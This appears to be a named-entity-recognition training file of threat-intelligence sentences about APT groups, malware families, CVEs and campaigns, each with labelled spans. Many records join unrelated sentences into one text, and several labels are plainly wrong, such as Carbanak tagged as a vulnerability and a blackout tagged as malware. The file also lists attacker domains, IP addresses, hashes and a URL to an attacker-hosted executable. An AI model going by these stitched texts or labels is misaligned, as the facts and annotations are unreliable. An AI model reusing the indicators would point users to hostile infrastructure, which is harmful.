{"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control ( C2 ) server .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: maritime": [[54, 62]], "ORGANIZATION: research institutes": [[128, 147]], "ORGANIZATION: academic organizations": [[150, 172]], "ORGANIZATION: private firms": [[179, 192]], "FILEPATH: Pony DLL": [[305, 313]], "FILEPATH: Vawtrak": [[318, 325]], "TOOL: C2": [[403, 405]]}, "info": {"id": "cyberner_stix_train_001990", "source": "cyberner_stix_train"}}
{"text": "This backdoor component however is technically very closely related to GeminiDuke , to the extent that we believe them to share parts of their source code .", "spans": {"MALWARE: GeminiDuke": [[71, 81]]}, "info": {"id": "cyberner_stix_train_001991", "source": "cyberner_stix_train"}}
{"text": "By proxying all requests through a custom server , the real source of ads is opaque . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The attachment was created using the traditional Chinese character set , and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website http://shwoo.gov.taipei/buyer_flowchart.asp . The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": {"TOOL: NetTraveler": [[110, 121]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "TOOL: NetTraveler Trojan": [[168, 186]], "ORGANIZATION: Taiwanese government": [[334, 354]], "URL: http://shwoo.gov.taipei/buyer_flowchart.asp": [[371, 414]], "SYSTEM: Exchange Server": [[494, 509]]}, "info": {"id": "cyberner_stix_train_001992", "source": "cyberner_stix_train"}}
{"text": "Constantly update your Android devices to the latest version to help prevent exploits , especially in the case of RCSAndroid which can affect only up to version 4.4.4 KitKat . The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia . which removes the mapping information . Most of the URLs and the infrastructure were not accessible at the time of analysis , although we managed to obtain images from three campaigns to recreate the infection chain .", "spans": {"SYSTEM: Android": [[23, 30]], "MALWARE: RCSAndroid": [[114, 124]], "SYSTEM: 4.4.4 KitKat": [[161, 173]], "THREAT_ACTOR: Cobalt group": [[180, 192]], "SYSTEM: URLs": [[342, 346]]}, "info": {"id": "cyberner_stix_train_001993", "source": "cyberner_stix_train"}}
{"text": "We recognized a different type of macOS malware , MarkMakingBot.dmg ( be37637d8f6c1fbe7f3ffc702afdfe1d ) , created on 2019-03-12 .", "spans": {"SYSTEM: macOS": [[34, 39]], "FILEPATH: MarkMakingBot.dmg": [[50, 67]], "FILEPATH: be37637d8f6c1fbe7f3ffc702afdfe1d": [[70, 102]]}, "info": {"id": "cyberner_stix_train_001994", "source": "cyberner_stix_train"}}
{"text": "Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API . Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT . Despite the differing sponsorship , penetration of Hong Kong and Taiwan based media organizations continues to be a priority for China based threat groups . On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": {"SYSTEM: Android": [[85, 92]], "TOOL: Spindest": [[216, 224]], "TOOL: legitimate compromised websites": [[229, 260]], "ORGANIZATION: Cyber Squared 's TCIRT": [[278, 300]], "MALWARE: blackout": [[519, 527]]}, "info": {"id": "cyberner_stix_train_001995", "source": "cyberner_stix_train"}}
{"text": "Further , the functionality of the OnionDuke variant is derived from a number of modules .", "spans": {"MALWARE: OnionDuke": [[35, 44]]}, "info": {"id": "cyberner_stix_train_001996", "source": "cyberner_stix_train"}}
{"text": "Overall , the post does a commendable job in making public findings previously only privately shared ( presumably by FireEye , and in several reports I authored for my employer , Dragos ) to threat intelligence customers .", "spans": {"ORGANIZATION: FireEye": [[117, 124]], "ORGANIZATION: Dragos": [[179, 185]]}, "info": {"id": "cyberner_stix_train_001997", "source": "cyberner_stix_train"}}
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": {"MALWARE: email stealer": [[4, 17]], "MALWARE: sctrls backdoor": [[256, 271]], "VULNERABILITY: CVE-2015-1641": [[325, 338]]}, "info": {"id": "cyberner_stix_train_001998", "source": "cyberner_stix_train"}}
{"text": "Related Github account contains forked Conversations repository Summarizing all the found clues , we have the following attribution flow : Conclusion The operation of ViceLeaker is still ongoing , as is our research . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation .", "spans": {"ORGANIZATION: Github": [[8, 14]], "MALWARE: ViceLeaker": [[167, 177]], "THREAT_ACTOR: group": [[304, 309]], "TOOL: email": [[352, 357]], "ORGANIZATION: ZLAB": [[414, 418]], "THREAT_ACTOR: TA505": [[528, 533]]}, "info": {"id": "cyberner_stix_train_001999", "source": "cyberner_stix_train"}}
{"text": "Trend Micro ’ s Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies , protecting devices against malware , zero-day and known exploits , privacy leaks , and application vulnerabilities . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks . Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "SYSTEM: Mobile App Reputation Service": [[16, 45]], "SYSTEM: Android": [[62, 69]], "SYSTEM: iOS": [[74, 77]], "TOOL: CobaltStrike": [[552, 564]], "TOOL: Powershell": [[574, 584]], "TOOL: Empire": [[585, 591]]}, "info": {"id": "cyberner_stix_train_002000", "source": "cyberner_stix_train"}}
{"text": "In 2018 , we saw similar behavior , but all the click actions were hardcoded and suited only for the app of the attacker ’ s choice . On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": {"ORGANIZATION: we": [[147, 149]], "THREAT_ACTOR: Lazarus group": [[242, 255]], "TOOL: emails": [[305, 311]], "ORGANIZATION: job recruiters": [[326, 340]]}, "info": {"id": "cyberner_stix_train_002001", "source": "cyberner_stix_train"}}
{"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito .", "spans": {"THREAT_ACTOR: cybercrime gang": [[17, 32]], "ORGANIZATION: banks": [[58, 63]], "ORGANIZATION: e-payment": [[66, 75]], "ORGANIZATION: financial institutions": [[88, 110]], "VULNERABILITY: Carbanak": [[160, 168]], "TOOL: Cobalt": [[173, 179]]}, "info": {"id": "cyberner_stix_train_002002", "source": "cyberner_stix_train"}}
{"text": "This is further corroborated by some older and unobfuscated samples from 2016 , whose primary classes are named CheckValidTarget . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . It can be perfectly executed without the header , but tools such as uncompyle6 need this header : $ uncompyle6 final2 . None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK ’s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": {"THREAT_ACTOR: OilRig": [[178, 184]], "ORGANIZATION: government": [[357, 367]], "MALWARE: N56.15.doc": [[370, 380]], "TOOL: uncompyle6": [[558, 568], [590, 600]], "MALWARE: LIGHTWORK ’s": [[787, 799]], "VULNERABILITY: IEC-104 protocol": [[813, 829]]}, "info": {"id": "cyberner_stix_train_002003", "source": "cyberner_stix_train"}}
{"text": "But they already have a lot of infected users on whom to test their methods . All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . In an effort to underscore there are actual individuals behind the keyboard , Mandiant is revealing three personas we have attributed to APT1 . The second webpage , “ sidebar.html ” contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": {"ORGANIZATION: Mandiant": [[352, 360]], "THREAT_ACTOR: APT1": [[411, 415]]}, "info": {"id": "cyberner_stix_train_002004", "source": "cyberner_stix_train"}}
{"text": "The macros used for these delivery documents use a less common method of using the AutoClose function .", "spans": {"TOOL: macros": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002005", "source": "cyberner_stix_train"}}
{"text": "Analysis Marcher is frequently distributed via SMS , but in this case , victims are presented with a link in an email . Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . The group has targeted defense organizations , supply chain manufacturers , human rights and nongovernmental organizations ( NGOs ) , and IT service providers .", "spans": {"MALWARE: Marcher": [[9, 16]], "ORGANIZATION: Researchers": [[120, 131]], "THREAT_ACTOR: Lazarus": [[143, 150]], "TOOL: malicious implant": [[194, 211]], "THREAT_ACTOR: Rising Sun": [[221, 231]], "ORGANIZATION: defense organizations": [[295, 316]]}, "info": {"id": "cyberner_stix_train_002006", "source": "cyberner_stix_train"}}
{"text": "We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC .", "spans": {"THREAT_ACTOR: APT41": [[57, 62]], "FILEPATH: AutoHotKey scripts": [[257, 275]]}, "info": {"id": "cyberner_stix_train_002007", "source": "cyberner_stix_train"}}
{"text": "This framework allows anyone to develop a malicious app with the desired icon and communication address . All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . It appears the group carries out supply chain attacks , leveraging the trust relationship between organizations to attack their primary targets .", "spans": {"THREAT_ACTOR: group": [[177, 182]], "TOOL: Internet Explorer": [[210, 227]], "TOOL: Flash": [[232, 237]]}, "info": {"id": "cyberner_stix_train_002008", "source": "cyberner_stix_train"}}
{"text": "usv0503.iqservs-jp.com aux.robertstockdill.com fli.fedora-dns-update.com bss.pvtcdn.com ssl.microsoft-security-center.com ssl.2upgrades.com 133.242.134.121 fli.fedora-dns-update.com .", "spans": {"DOMAIN: usv0503.iqservs-jp.com": [[0, 22]], "DOMAIN: aux.robertstockdill.com": [[23, 46]], "DOMAIN: fli.fedora-dns-update.com": [[47, 72], [156, 181]], "DOMAIN: bss.pvtcdn.com": [[73, 87]], "DOMAIN: ssl.microsoft-security-center.com": [[88, 121]], "DOMAIN: ssl.2upgrades.com": [[122, 139]], "IP_ADDRESS: 133.242.134.121": [[140, 155]]}, "info": {"id": "cyberner_stix_train_002009", "source": "cyberner_stix_train"}}
{"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]], "MALWARE: Remexi": [[159, 165]], "MALWARE: Trojan": [[187, 193]]}, "info": {"id": "cyberner_stix_train_002010", "source": "cyberner_stix_train"}}
{"text": "Depending on which app ( package name ) generated the event , Riltok can : Open a fake Google Play screen requesting bank card details Open a fake screen or phishing page in a browser ( inject ) mimicking the screen of the relevant mobile banking app and requesting user/bank card details Minimize the app ( for example , antivirus applications or device security settings ) Additionally , the Trojan can hide notifications from certain banking apps . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . The C2 is different and the analysed version this time only contains a single domain: dowhelsitjs.netau.net .", "spans": {"MALWARE: Riltok": [[62, 68]], "SYSTEM: Google Play": [[87, 98]], "ORGANIZATION: ESET": [[452, 456]], "TOOL: PowerShell scripts": [[475, 493]], "THREAT_ACTOR: Turla": [[508, 513]], "TOOL: C2": [[583, 585]], "DOMAIN: dowhelsitjs.netau.net": [[665, 686]]}, "info": {"id": "cyberner_stix_train_002011", "source": "cyberner_stix_train"}}
{"text": "The encrypted ZeroT payload , named Mctl.mui , is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously .", "spans": {"MALWARE: ZeroT": [[14, 19], [158, 163]], "FILEPATH: Mctl.mui": [[36, 44]], "TOOL: PE": [[99, 101]]}, "info": {"id": "cyberner_stix_train_002012", "source": "cyberner_stix_train"}}
{"text": "An attacker is paid by the network when one of these apps is installed successfully . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents . with 2 . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": {"THREAT_ACTOR: groups": [[92, 98]], "THREAT_ACTOR: attackers": [[121, 130]], "THREAT_ACTOR: Rocket Kitten": [[141, 154]], "ORGANIZATION: anonymous proxy users": [[215, 236]], "ORGANIZATION: researchers": [[239, 250]], "ORGANIZATION: journalists": [[253, 264]], "ORGANIZATION: dissidents": [[271, 281]], "ORGANIZATION: FireEye": [[368, 375]], "TOOL: Cobalt Strike": [[437, 450]]}, "info": {"id": "cyberner_stix_train_002013", "source": "cyberner_stix_train"}}
{"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations .", "spans": {"THREAT_ACTOR: Machete": [[116, 123]], "THREAT_ACTOR: operators": [[305, 314]], "THREAT_ACTOR: APT38": [[323, 328]]}, "info": {"id": "cyberner_stix_train_002014", "source": "cyberner_stix_train"}}
{"text": "Based on our detection statistics , the main infection vector is the spread of Trojanized applications directly to victims via Telegram and WhatsApp messengers . These unknown actors continued launching DDoS attacks over the next few years . We have found several victims of this campaign , based on our telemetry – investment and trading companies in Vietnam and Russia .", "spans": {"THREAT_ACTOR: unknown actors": [[168, 182]]}, "info": {"id": "cyberner_stix_train_002015", "source": "cyberner_stix_train"}}
{"text": "According to Google , whom we have contacted to alert about our discoveries , nearly 25 variants of this spyware were uploaded on Google Play Store . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent . Execute a command and send the output to Google Forms . Once encryption is complete , it attempts to delete Volume Shadow VSS copies .", "spans": {"ORGANIZATION: Google": [[13, 19]], "SYSTEM: Google Play Store": [[130, 147]], "TOOL: Clayslide documents": [[227, 246]], "TOOL: Helminth": [[289, 297]], "TOOL: ISMDoor Trojan": [[360, 374]], "TOOL: ISMAgent": [[435, 443]], "TOOL: Google Forms": [[487, 499]]}, "info": {"id": "cyberner_stix_train_002016", "source": "cyberner_stix_train"}}
{"text": "By browsing EventBot ’ s installation path on the device , we can see the library dropped in the app_dex folder . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence .", "spans": {"MALWARE: EventBot": [[12, 20]], "ORGANIZATION: Anomali": [[114, 121]], "MALWARE: ITW": [[200, 203]], "VULNERABILITY: CVE-2018-0798": [[231, 244]], "THREAT_ACTOR: APT35": [[247, 252]], "THREAT_ACTOR: Newscaster Team": [[273, 288]]}, "info": {"id": "cyberner_stix_train_002017", "source": "cyberner_stix_train"}}
{"text": "Due to this feature , it is clear that the developers paid special attention to the work of the implant on Huawei devices . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Axiom : Group72 .", "spans": {"ORGANIZATION: Huawei": [[107, 113]], "THREAT_ACTOR: Axiom": [[298, 303]], "THREAT_ACTOR: Group72": [[306, 313]]}, "info": {"id": "cyberner_stix_train_002018", "source": "cyberner_stix_train"}}
{"text": "However , this time the app name for both HenBox and the embedded app were identical : Islamawazi . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment .", "spans": {"MALWARE: HenBox": [[42, 48]], "SYSTEM: Islamawazi": [[87, 97]], "THREAT_ACTOR: APT41": [[100, 105]], "ORGANIZATION: FireEye": [[171, 178]], "MALWARE: APT28": [[289, 294]], "MALWARE: malware": [[295, 302]], "MALWARE: CHOPSTICK": [[364, 373]]}, "info": {"id": "cyberner_stix_train_002019", "source": "cyberner_stix_train"}}
{"text": "While doing so , it will reach a service exported by “ Agent Smith ” , and sends out an authentication request that would lead to a call to the ‘ addAccount ’ method . Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind . Msiexec.exe next calls rundll32.exe , specifying loader DLL E-TOOL ( urlmon.7z in the example above ) in order to decrypt the data file . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"MALWARE: Agent Smith": [[55, 66]], "TOOL: Anunak/Carbanak": [[213, 228]], "ORGANIZATION: Fox-IT": [[243, 249]], "ORGANIZATION: Kaspersky": [[254, 263]], "FILEPATH: Msiexec.exe": [[280, 291]], "FILEPATH: rundll32.exe": [[303, 315]], "TOOL: loader": [[329, 335]], "TOOL: DLL E-TOOL": [[336, 346]], "FILEPATH: urlmon.7z": [[349, 358]], "MALWARE: decrypt the data file": [[394, 415]], "TOOL: Google": [[486, 492]], "TOOL: Adobe": [[525, 530]]}, "info": {"id": "cyberner_stix_train_002020", "source": "cyberner_stix_train"}}
{"text": "Google is actively combating this use of the service , responding quickly to reports from antivirus companies and blocking the IDs of cybercriminals . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks . The configuration size is 2180 bytes and the encrypted strings are located at offset 0x84 . Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: telecoms companies": [[244, 262]], "ORGANIZATION: customers": [[288, 297]], "THREAT_ACTOR: Threat actors": [[426, 439]], "THREAT_ACTOR: Winnti group": [[449, 461]]}, "info": {"id": "cyberner_stix_train_002021", "source": "cyberner_stix_train"}}
{"text": "Another chunk is used to copy a basic Ntdll and Kernel32 import address table . Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States . The resources also store one or more C2 communication modules . There is another important point we stole a fairly large amount of sensitive data from your local network financial documents personal information of your employees , customers , partners work documentation , postal correspondence and much more .", "spans": {"TOOL: unsophisticated technical merit": [[108, 139]], "TOOL: C2": [[384, 386]]}, "info": {"id": "cyberner_stix_train_002022", "source": "cyberner_stix_train"}}
{"text": "When the victim double clicks on the executable file , it unpacks and installs the Spark backdoor , as shown in the attack tree screenshot below .", "spans": {"MALWARE: Spark backdoor": [[83, 97]]}, "info": {"id": "cyberner_stix_train_002023", "source": "cyberner_stix_train"}}
{"text": "Specific targets include staff working for or associated with Hillary Clinton's presidential campaign and the Democratic National Committee ( DNC ) , including individuals managing Clinton's communications , travel , campaign finances , and advising her on policy .", "spans": {"ORGANIZATION: Democratic National Committee": [[110, 139]], "ORGANIZATION: DNC": [[142, 145]]}, "info": {"id": "cyberner_stix_train_002024", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Labs has previously noted the presence of Russian-language artefacts in some of the Duke malware samples .", "spans": {"ORGANIZATION: Kaspersky Labs": [[0, 14]], "THREAT_ACTOR: Duke": [[94, 98]]}, "info": {"id": "cyberner_stix_train_002025", "source": "cyberner_stix_train"}}
{"text": "Microsoft patched this vulnerability in September 2012 , suggesting that this watering hole attack used an older vulnerability , which aligns with Scarlet Mimic continued use of older vulnerabilities in their spear-phishing efforts . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: Scarlet Mimic": [[147, 160]], "THREAT_ACTOR: actors": [[265, 271]], "ORGANIZATION: individual": [[306, 316]]}, "info": {"id": "cyberner_stix_train_002026", "source": "cyberner_stix_train"}}
{"text": "The URL will trigger exploits for arbitrary memory read ( CVE-2012-2825 ) and heap buffer overflow ( CVE-2012-2871 ) vulnerabilities in the default browsers of Android versions 4.0 Ice Cream Sandwich to 4.3 Jelly Bean , allowing another local privilege escalation exploit to execute . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . ( which is further explained later ) The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": {"VULNERABILITY: arbitrary memory read ( CVE-2012-2825 )": [[34, 73]], "VULNERABILITY: heap buffer overflow ( CVE-2012-2871 )": [[78, 116]], "SYSTEM: Android versions 4.0 Ice Cream Sandwich": [[160, 199]], "SYSTEM: 4.3 Jelly Bean": [[203, 217]], "VULNERABILITY: Carbanak": [[305, 313]], "THREAT_ACTOR: criminals": [[380, 389]], "ORGANIZATION: financial industry": [[430, 448]], "ORGANIZATION: customers": [[472, 481]]}, "info": {"id": "cyberner_stix_train_002027", "source": "cyberner_stix_train"}}
{"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims ’ money This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . At 06:38 , the attackers were observed downloading a custom .NET FTP tool to the infected computer . 192.119.15.36 880 http://192.119.15.36:880/ftp.exe . Cybersecurity researchers recently uncovered a phishing campaign , dubbed BadBlood , aimed at 25 senior professionals specializing in genetic , neurology , and oncology research in the U.S. and Israel .", "spans": {"SYSTEM: Facebook": [[203, 211]], "SYSTEM: Viber": [[234, 239]], "SYSTEM: WhatsApp": [[262, 270]], "MALWARE: IOC files": [[523, 532]], "THREAT_ACTOR: HIDDEN COBRA": [[541, 553]], "TOOL: FALLCHILL": [[576, 585]], "MALWARE: .NET FTP": [[648, 656]], "IP_ADDRESS: 192.119.15.36 880": [[689, 706]], "URL: http://192.119.15.36:880/ftp.exe": [[707, 739]], "ORGANIZATION: Cybersecurity researchers": [[742, 767]], "ORGANIZATION: 25 senior professionals specializing in genetic , neurology , and oncology research": [[836, 919]]}, "info": {"id": "cyberner_stix_train_002028", "source": "cyberner_stix_train"}}
{"text": "Although this malware 's credential-harvest mechanism is not particularly sophisticated , it does have an advanced self-preservation mechanism . The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . Although it doesn’t contain an internal name , we believe it’s a variant of HttpProv library , as described in the ESET white paper on OceanLotus . We also found a live service selling VPS hosting at secure[.]66[.]to .", "spans": {"TOOL: Poison Ivy": [[149, 159]], "THREAT_ACTOR: attackers": [[179, 188]], "TOOL: HttpProv library": [[423, 439]], "ORGANIZATION: ESET": [[462, 466]], "THREAT_ACTOR: OceanLotus": [[482, 492]]}, "info": {"id": "cyberner_stix_train_002029", "source": "cyberner_stix_train"}}
{"text": "TUESDAY , MAY 19 , 2020 The wolf is back ... NEWS SUMMARY Thai Android devices and users are being targeted by a modified version of DenDroid we are calling \" WolfRAT , '' now targeting messaging apps like WhatsApp , Facebook Messenger and Line . Perhaps it also points to the suspected North Korean origin of attack . APT12 . The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"SYSTEM: Android": [[63, 70]], "MALWARE: DenDroid": [[133, 141]], "MALWARE: WolfRAT": [[159, 166]], "SYSTEM: WhatsApp": [[206, 214]], "SYSTEM: Facebook Messenger": [[217, 235]], "SYSTEM: Line": [[240, 244]], "THREAT_ACTOR: APT12": [[319, 324]], "SYSTEM: CSP": [[347, 350]]}, "info": {"id": "cyberner_stix_train_002030", "source": "cyberner_stix_train"}}
{"text": "In some cases , it uses this mechanism to send log data of important actions . PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"THREAT_ACTOR: PLATINUM": [[79, 87]], "TOOL: custom tools": [[130, 142]], "ORGANIZATION: government office": [[314, 331]], "FILEPATH: Word documents": [[386, 400]]}, "info": {"id": "cyberner_stix_train_002031", "source": "cyberner_stix_train"}}
{"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot .", "spans": {"TOOL: Enfal malware": [[21, 34]], "MALWARE: Backdoor.APT.Pgift": [[77, 95]], "THREAT_ACTOR: MoneyTaker": [[167, 177]], "MALWARE: fileless": [[185, 193]]}, "info": {"id": "cyberner_stix_train_002032", "source": "cyberner_stix_train"}}
{"text": "Typically , however , cybercriminals first test-run a technology on the Russian sector of the Internet and then roll it out globally , attacking users in other countries . The codename for Turla APT group in this presentation is MAKERSMARK . Winnti : CLR.exe . We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": {"THREAT_ACTOR: Turla APT group": [[189, 204]], "THREAT_ACTOR: Winnti": [[242, 248]], "FILEPATH: CLR.exe": [[251, 258]], "ORGANIZATION: cyber range": [[330, 341]], "ORGANIZATION: Rostelecom - Solar": [[371, 389]], "ORGANIZATION: Russian cyber security company": [[394, 424]]}, "info": {"id": "cyberner_stix_train_002033", "source": "cyberner_stix_train"}}
{"text": "Key information consists of an MD5 hash of the device 's Android ID , the device manufacturer , and the device model with each separated by an underscore . In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM . globalowa.com gmailboxes.com hugesoft.org idirectech.com ifexcel.com infosupports.com livemymsn.com mcafeepaying.com microsoft-update-info.com micyuisyahooapis.com msnhome.org pcclubddk.net progammerli.com softsolutionbox.net symanteconline.net webservicesupdate.com . We took google - analytics as an example , but other services can also be used .", "spans": {"SYSTEM: Android": [[57, 64]], "ORGANIZATION: security firm": [[184, 197]], "ORGANIZATION: Resecurity": [[198, 208]], "DOMAIN: globalowa.com": [[355, 368]], "DOMAIN: gmailboxes.com": [[369, 383]], "DOMAIN: hugesoft.org": [[384, 396]], "DOMAIN: idirectech.com": [[397, 411]], "DOMAIN: ifexcel.com": [[412, 423]], "DOMAIN: infosupports.com": [[424, 440]], "DOMAIN: livemymsn.com": [[441, 454]], "DOMAIN: mcafeepaying.com": [[455, 471]], "DOMAIN: microsoft-update-info.com": [[472, 497]], "DOMAIN: micyuisyahooapis.com": [[498, 518]], "DOMAIN: msnhome.org": [[519, 530]], "DOMAIN: pcclubddk.net": [[531, 544]], "DOMAIN: progammerli.com": [[545, 560]], "DOMAIN: softsolutionbox.net": [[561, 580]], "DOMAIN: symanteconline.net": [[581, 599]], "DOMAIN: webservicesupdate.com": [[600, 621]], "SYSTEM: google - analytics": [[632, 650]]}, "info": {"id": "cyberner_stix_train_002034", "source": "cyberner_stix_train"}}
{"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 .", "spans": {"SYSTEM: Next-Generation Firewall ( NGFW )": [[36, 69]], "SYSTEM: Next-Generation Intrusion Prevention System ( NGIPS )": [[72, 125]], "SYSTEM: Meraki MX": [[132, 141]], "MALWARE: GoogleUpdate.exe": [[206, 222]], "THREAT_ACTOR: TEMP.Hermit": [[341, 352]], "MALWARE: MACKTRUCK": [[363, 372]], "THREAT_ACTOR: APT38": [[399, 404]], "ORGANIZATION: bank": [[429, 433]]}, "info": {"id": "cyberner_stix_train_002035", "source": "cyberner_stix_train"}}
{"text": "] nampriknum [ . These versions of KeyBoy differed from the one first described by Rapid7 in several ways , many of which will be described in the sections to follow . Naturally , our first priority is ensuring that we detect the new or altered TTPs . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"TOOL: KeyBoy": [[35, 41]], "ORGANIZATION: Rapid7": [[83, 89]], "MALWARE: NetSupport RAT": [[290, 304]]}, "info": {"id": "cyberner_stix_train_002036", "source": "cyberner_stix_train"}}
